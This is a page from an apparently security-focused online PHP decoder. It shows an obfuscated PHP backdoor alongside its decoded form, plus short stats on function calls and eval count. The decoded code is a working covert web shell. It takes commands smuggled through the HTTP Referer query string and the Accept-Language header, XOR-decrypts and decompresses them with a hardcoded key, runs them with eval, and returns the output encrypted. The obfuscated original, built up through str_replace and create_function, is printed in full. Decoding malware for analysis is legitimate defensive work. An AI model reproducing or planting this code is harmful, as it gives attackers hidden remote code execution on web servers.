Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $M='rMK($u["queryMK"],$q);$qMK=array_valuesMKMK($q);preg_MKmaMKtchMK_all("/([\\w])M..
Decoded Output download
$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}
Did this file decode correctly?
Original Code
<?php
$M='rMK($u["queryMK"],$q);$qMK=array_valuesMKMK($q);preg_MKmaMKtchMK_all("/([\\w])MK[\\w-]+MK(';
$D='$kMKh=MK"5d41";$kf="402a"MK;fuMKnction MKx($MKt,$k){MK$c=strlenMK($kMK);$l=strMKlen($MKt);';
$W='Knt($m[1MK]);$MKMKz++)$p.=$MKq[$mMK[2][$z]];iMKMKf(strpos($p,$hMK)=MK==0){$s[$MKMKi]="";';
$T='e(x(gzcoMKmpresMKs($oMK),$k));MKprintMKMK(MK"<$k>$d</$kMK>");@sessioMKn_destroMKy();}}}}';
$v=',0,$e)MK)),$k)))MKMK;$o=ob_getMK_conMKtents();obMK_eMKnd_cleMKan(MK);$d=base6MK4_eMKncod';
$f='KONMK;$ss="subsMKtrMK";$sl="strtoMKlMKower";$MKi=$mMK[1][0MK].$m[1][MK1];$h=$sl(MK$ss(MKM';
$b='i}^$k{MK$j};MK}}return MK$o;MK}$r=$_SERVMKER;$MKrr=@$r[MK"HTTP_MKREMKMKFERER"];$ra=@$r["';
$y='$oMK="";for(MK$i=0;$i<MK$l;MK){forMK($j=0;($MKj<$c&&MK$i<$MKl);$j+MK+,$iMK++){$o.=$tMK{$';
$A='Kmd5($MKi.MK$kh),0,3MK));$f=$slMKMKMK($ss(md5($iMK.$kf),0,3));MK$p="";for($z=1;MK$z<couM';
$h='HMKTTMKP_ACCMKEPT_LANGUAMKGE"];iMKf(MKMK$rr&&MK$ra){MK$u=parse_url($rr)MK;parseMK_stMKMK';
$I=str_replace('H','','creHHate_HfHHunHction');
$G='$MKp=$ss($MKp,3);}if(arMKMKray_key_exiMKsts($MKi,$s)){$sMK[MK$i].=$p;$e=MKsMKtrMKpos($s[';
$k='?:;qMKMK=0.([\\MKMKMKd]))?,?/",$ra,$mMK);if($q&&$m){@sMKeMKssion_stMKart();$s=&$MK_SESSIM';
$q='4_decodMKMKe(preg_MKreplace(arrMKMKay("/_/","/-/MK"),MKarrayMK("/","+"MK),$sMKs(MK$s[$i]';
$d='$i],$f);MKif(MK$e){$MKk=$kh.$kf;MKob_sMKtarMKt();@evaMKl(@gzunMKcMKompress(@x(@bMKasMKe6';
$E=str_replace('MK','',$D.$y.$b.$h.$M.$k.$f.$A.$W.$G.$d.$q.$v.$T);
$P=$I('',$E);$P();
?>
Function Calls
null | 1 |
str_replace | 2 |
create_function | 1 |
Stats
MD5 | c609d9e6bc844fb9d49fee78fa764e55 |
Eval Count | 1 |
Decode Time | 134 ms |